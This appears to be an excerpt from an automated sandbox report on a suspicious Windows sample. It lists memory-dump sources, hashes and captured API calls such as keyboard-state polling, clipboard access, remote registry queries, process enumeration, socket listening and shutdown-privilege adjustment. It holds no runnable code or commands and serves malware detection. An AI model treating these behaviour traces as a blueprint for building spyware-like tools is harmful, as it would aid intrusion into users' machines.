                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                • String ID: \*.*$p1#v`K$v
                                                • API String ID: 2643075503-1732502266
                                                • Opcode ID: 2debc51fa9503b4fc767fc9fc006d1418d4d60760463a5445c958e7b03749f89
                                                • Instruction ID: 6dad83678478f69b3fa5d9bc894c278c70bfed9d0a9bc8587a6935af374e8d62
                                                • Opcode Fuzzy Hash: 2debc51fa9503b4fc767fc9fc006d1418d4d60760463a5445c958e7b03749f89
                                                • Instruction Fuzzy Hash: FD3180B240C384AEC721DBA48985EDBB7DCAF65350F440D2EF6D9C3142EA35D60987A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                • API String ID: 0-4052911093
                                                • Opcode ID: 553cadad0b65226f1f5dedafc0973351c9ed5e6409929078685a601d3536413f
                                                • Instruction ID: 3e596daf175f65629c383acb1c11434e8e02739a4f58c8d0f9ea5919ce748869
                                                • Opcode Fuzzy Hash: 553cadad0b65226f1f5dedafc0973351c9ed5e6409929078685a601d3536413f
                                                • Instruction Fuzzy Hash: 14727F71E042299BDF24DF58D8807AEB7F5FF49710F1441AAE819EB280DB749E81DB90
                                                APIs
                                                  • Part of subcall function 00B03C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B02BB5,?,?), ref: 00B03C1D
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B0328E
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B0332D
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B033C5
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B03604
                                                • RegCloseKey.ADVAPI32(00000000), ref: 00B03611
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: bce51051bff7afdb45ab84db4b74541ecf3bcdeb056b637cec5ac3113d1efc94
                                                • Instruction ID: de715a59c8760985380861877e565526a29c546e925c959364728523c3d44c38
                                                • Opcode Fuzzy Hash: bce51051bff7afdb45ab84db4b74541ecf3bcdeb056b637cec5ac3113d1efc94
                                                • Instruction Fuzzy Hash: 88E14A71604200AFCB15DF29C995E2BBBE8FF89710F0489ADF54ADB2A1DB31E905CB51
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 00AE2B5F
                                                • GetAsyncKeyState.USER32(000000A0), ref: 00AE2BE0
                                                • GetKeyState.USER32(000000A0), ref: 00AE2BFB
                                                • GetAsyncKeyState.USER32(000000A1), ref: 00AE2C15
                                                • GetKeyState.USER32(000000A1), ref: 00AE2C2A
                                                • GetAsyncKeyState.USER32(00000011), ref: 00AE2C42
                                                • GetKeyState.USER32(00000011), ref: 00AE2C54
                                                • GetAsyncKeyState.USER32(00000012), ref: 00AE2C6C
                                                • GetKeyState.USER32(00000012), ref: 00AE2C7E
                                                • GetAsyncKeyState.USER32(0000005B), ref: 00AE2C96
                                                • GetKeyState.USER32(0000005B), ref: 00AE2CA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 2dd5059384a4bcd009af3ec8893c2bd9d5a3fef33868e6fbbe47a33cab471deb
                                                • Instruction ID: 3db143737fb26a08c42313b4a75dcdda53db93c6c5c5129f8265f526c72d1ac0
                                                • Opcode Fuzzy Hash: 2dd5059384a4bcd009af3ec8893c2bd9d5a3fef33868e6fbbe47a33cab471deb
                                                • Instruction Fuzzy Hash: BE41E4305047C96DFF349B62C8043AABEA86F61304F148459D9C6572C2EFE49DC8C7A2
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: 37e4884546b57f1962d5a50a260155cf159c80218704c0c2e30ed0021e656a35
                                                • Instruction ID: 529cf637b550acbaef9fcfe8697c29581a4b81b39c49699c2b9c7c6bbc773608
                                                • Opcode Fuzzy Hash: 37e4884546b57f1962d5a50a260155cf159c80218704c0c2e30ed0021e656a35
                                                • Instruction Fuzzy Hash: 22218E31300614AFDB21AFA4DD49B6DB7A9FF54711F04841AFA0ADB2A1DF74ED028B94
                                                APIs
                                                  • Part of subcall function 00AD9ABF: CLSIDFromProgID.OLE32 ref: 00AD9ADC
                                                  • Part of subcall function 00AD9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00AD9AF7
                                                  • Part of subcall function 00AD9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00AD9B05
                                                  • Part of subcall function 00AD9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00AD9B15
                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00AFC235
                                                • _memset.LIBCMT ref: 00AFC242
                                                • _memset.LIBCMT ref: 00AFC360
                                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00AFC38C
                                                • CoTaskMemFree.OLE32(?), ref: 00AFC397
                                                Strings
                                                • NULL Pointer assignment, xrefs: 00AFC3E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                • String ID: NULL Pointer assignment
                                                • API String ID: 1300414916-2785691316
                                                • Opcode ID: 046e0907322637680869fdfab0294530709780e0a69f5766e435e310c446f5bc
                                                • Instruction ID: dff19df6f8a3acca0d80a88d6a15ecc52defdd40b5e198e75f7df5d9becd5f7e
                                                • Opcode Fuzzy Hash: 046e0907322637680869fdfab0294530709780e0a69f5766e435e310c446f5bc
                                                • Instruction Fuzzy Hash: 41913871D0021CABDB10DF95DD85EEEBBB8EF08760F10815AF515AB281EB709A45CFA0
                                                APIs
                                                  • Part of subcall function 00ADB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ADB180
                                                  • Part of subcall function 00ADB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ADB1AD
                                                  • Part of subcall function 00ADB134: GetLastError.KERNEL32 ref: 00ADB1BA
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00AE7A0F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: 1d1a6a4bb0259a4799c9e4a19c1915919d1dcee36fa60ccdf376a8d51f9e8758
                                                • Instruction ID: 1231ff4a3526f15c8a1f34f10249eb6374969ad738e73d91d41f25a31c882bd6
                                                • Opcode Fuzzy Hash: 1d1a6a4bb0259a4799c9e4a19c1915919d1dcee36fa60ccdf376a8d51f9e8758
                                                • Instruction Fuzzy Hash: 5901DB717582A16AF7386779DC5ABBF72689B007C0F140935FD43E31D2EEA09E0182B0
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AF8CA8
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF8CB7
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00AF8CD3
                                                • listen.WSOCK32(00000000,00000005), ref: 00AF8CE2
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF8CFC
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00AF8D10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: 55ae4e62898123f90d26bbec9f7380d72c6506e8b22d0d816d611ef1fe92bec7
                                                • Instruction ID: 1064aef30451b9d04bc1cb6fa802abc711b0bd845820633d0db90b6fb8b9b038
                                                • Opcode Fuzzy Hash: 55ae4e62898123f90d26bbec9f7380d72c6506e8b22d0d816d611ef1fe92bec7
                                                • Instruction Fuzzy Hash: BD21B4316002049FCB20EF64C945B7EB7B9FF49724F108158FA56A72E2CB78AD42CB61
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AE6554
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AE6564
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AE6583
                                                • __wsplitpath.LIBCMT ref: 00AE65A7
                                                • _wcscat.LIBCMT ref: 00AE65BA
                                                • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AE65F9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                • String ID:
                                                • API String ID: 1605983538-0
                                                • Opcode ID: 7e997de4670192b049e292b11a1b6b0beef91c5de7516a7d2ddc1ec0180b1c73
                                                • Instruction ID: 0c001d99e7ebe3d00b3ea1152dddcbe3176e189fa59d999c7255d631043efe1c
                                                • Opcode Fuzzy Hash: 7e997de4670192b049e292b11a1b6b0beef91c5de7516a7d2ddc1ec0180b1c73
                                                • Instruction Fuzzy Hash: B621A471A00258ABDB20ABA5CD88FEEB7BCAB19340F5004A9F505E3141EB719F85CB60
                                                APIs
                                                  • Part of subcall function 00AFA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00AFA84E
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00AF9296
                                                • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00AF92B9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorLastinet_addrsocket
                                                • String ID:
                                                • API String ID: 4170576061-0
                                                • Opcode ID: a3a001b7340c350601cf393970e4c5a186a6af0d451f47ce6a2da3caf6da5e19
                                                • Instruction ID: 3e76726ce48aa5bf84bcd87528cd339bb72e07c0ee3c6f99f35190873dd28a0d
                                                • Opcode Fuzzy Hash: a3a001b7340c350601cf393970e4c5a186a6af0d451f47ce6a2da3caf6da5e19
                                                • Instruction Fuzzy Hash: 1441BF70600204AFDB10AF688D52EBF77EDEF44764F14454CFA56AB2D2DB749D028B91
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00AEEB8A
                                                • _wcscmp.LIBCMT ref: 00AEEBBA
                                                • _wcscmp.LIBCMT ref: 00AEEBCF
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00AEEBE0
                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AEEC0E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNext
                                                • String ID:
                                                • API String ID: 2387731787-0
                                                • Opcode ID: fb035f60e91951189ee8ea9ecb89226731a0d6e3efb507f958d99238244d2234
                                                • Instruction ID: b7a06d36e08aa2497476f8e54c06f40f1d62458437b9d58967a5655dfc266817
                                                • Opcode Fuzzy Hash: fb035f60e91951189ee8ea9ecb89226731a0d6e3efb507f958d99238244d2234
                                                • Instruction Fuzzy Hash: 3D41B035600301CFC718DF29C491E9AB7E4FF49324F20455DE95A8B3A1DB31AD45CB91
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 9570f7c1c7530da55016460f3e06ba7dda2f95b04230c9f69d44169ad4b5d17d
                                                • Instruction ID: 8cc57ce027804466caf6dbb8ac9b8be5f0f3c4e9e99f24db8e1038a79110ad5d
                                                • Opcode Fuzzy Hash: 9570f7c1c7530da55016460f3e06ba7dda2f95b04230c9f69d44169ad4b5d17d
                                                • Instruction Fuzzy Hash: 65116D31300611AFE7216F269D44B6FBBDDEF59760B044469F889E7281CF74AA0386A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-1546025612
                                                • Opcode ID: 172c8c8aac001be2b77b8aaa5f15e82d96e3b5572e6aa6ba5111beaf6999bab6
                                                • Instruction ID: 69834280f5888d50759a9affcf0c8a07db061c7ce525f6c65c1e8b43b6eab805
                                                • Opcode Fuzzy Hash: 172c8c8aac001be2b77b8aaa5f15e82d96e3b5572e6aa6ba5111beaf6999bab6
                                                • Instruction Fuzzy Hash: 47926D71E0022ACBDF24CF58D8807EEB7F1FB55314F2585AAD81AAB280D7759D81CB91
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00ABE014,76230AE0,00ABDEF1,00B3DC38,?,?), ref: 00ABE02C
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00ABE03E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 2ba55a50375863a208af200ee4b633354862e4aac3e5bef31d2ef6018131ceae
                                                • Instruction ID: 51facaf5cc30917b77a63818382351bfc3ab13aac31aeeeb70230e1cc3343e19
                                                • Opcode Fuzzy Hash: 2ba55a50375863a208af200ee4b633354862e4aac3e5bef31d2ef6018131ceae
                                                • Instruction Fuzzy Hash: 1BD0A7305417129FD7329F60EC097D276F8AB05302F184499E881E3560EBB4C8858650
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AE13DC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                • Opcode ID: 75d95de706c69f0fc29bb20d46bed7e0a9f2b81394dad31f372dd5de2b7adb6d
                                                • Instruction ID: dd82153676aed484362abdba1be21a326f665187fae0770b79e7b1d30d39d197
                                                • Opcode Fuzzy Hash: 75d95de706c69f0fc29bb20d46bed7e0a9f2b81394dad31f372dd5de2b7adb6d
                                                • Instruction Fuzzy Hash: B33226B5A007159FC728CF69C480A6AB7F0FF48310B55C56EE49ADB3A2E770E941CB44
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 00ABB22F
                                                  • Part of subcall function 00ABB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00ABB5A5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Proc$LongWindow
                                                • String ID:
                                                • API String ID: 2749884682-0
                                                • Opcode ID: c291e5facf27d0af8af73670f6eff7f822460975a9d27657a262c6ca7a0c6130
                                                • Instruction ID: e957d3390fd24677a61a0c8665f2af9aca1fa59b2f3e47a42132ffab175db2cb
                                                • Opcode Fuzzy Hash: c291e5facf27d0af8af73670f6eff7f822460975a9d27657a262c6ca7a0c6130
                                                • Instruction Fuzzy Hash: 10A16670134005BADB38AB2E9C88EFF29EDEB56340B94415DF912D66D3CBA5DC40D272
                                                APIs
                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00AF43BF,00000000), ref: 00AF4FA6
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00AF4FD2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
